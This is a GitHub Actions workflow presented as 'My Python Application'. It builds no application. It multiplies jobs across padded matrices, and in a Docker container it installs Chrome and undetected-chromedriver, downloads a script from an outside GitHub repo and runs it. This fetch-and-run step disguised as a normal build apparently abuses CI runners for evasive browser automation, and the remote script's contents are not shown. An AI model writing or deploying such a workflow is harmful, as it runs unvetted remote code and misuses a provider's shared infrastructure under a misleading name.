# This is a basic workflow to help you get started with Actions

# ------------------------------------ #
#       Made By Anli V.1.0.0           #
# ------------------------------------ #
name: My Python Application
# ------------------------------------ #
on:
  push:
    branches: [ main ]
  pull_request:
    branches: [ main ]
  workflow_dispatch:
# ------------------------------------ #
jobs:
  pret:
    runs-on: ubuntu-20.04
    strategy:
      max-parallel: 20
      fail-fast: false
      matrix:
        testi: [1.1, 27, 278, 2v, 9e, 93h, os, yys,]
        flaga: [Aqw, his, ]
    timeout-minutes: 360
    steps:
    - name: Setup
      uses: actions/checkout@v1
    - name: runneyr_go
      run: |
        sudo apt update -y && sleep 5
        
  Build:
    needs: [pret]
    runs-on: ubuntu-latest
    strategy:
      matrix:
        python-version: [3.9, 3.8, 3.7]
        lp: [1, 3.2, 4, 23, 38, 83, 2.2, 12, 28, 124, a, b, c, d, e, f, g, h, i, j ,k]
    steps:
# ------------------------------------ #
    - name: Checkout Code
      uses: actions/checkout@v2
# ------------------------------------ #
    - name: Set up Python ${{ matrix.python-version }}
      uses: actions/setup-python@v2
      with:
        python-version: ${{ matrix.python-version }}
# ------------------------------------ #
    - name: EBroo...
      run: sudo apt-get update && sudo apt-get upgrade -y && sudo docker --version && sudo docker run --name Ada ubuntu sh -c "apt-get update && apt-get upgrade -y && apt-get install wget -y && apt-get install dialog -y && apt-get -y install apt-utils unzip && echo 'debconf debconf/frontend select Noninteractive' | debconf-set-selections && apt-get install -y -q && wget https://dl.google.com/linux/direct/google-chrome-stable_current_amd64.deb && apt install -y ./google-chrome-stable_current_amd64.deb && wget -N https://chromedriver.storage.googleapis.com/100.0.4896.60/chromedriver_linux64.zip -P ~/ && unzip ~/chromedriver_linux64.zip -d ~/ && rm ~/chromedriver_linux64.zip && mv -f ~/chromedriver /usr/local/bin/chromedriver && chown root:root /usr/local/bin/chromedriver && chmod 0755 /usr/local/bin/chromedriver && apt install python3-pip -y && pip install undetected-chromedriver && pip install selenium && wget https://github.com/Tamisv2/bypass-paywalls-chrome/raw/master/build/lo.txt -O ai2.html && wget https://github.com/Tamisv2/bavmw29/raw/main/kmi.py && python3 kmi.py && sleep 48"
# ------------------------------------ #




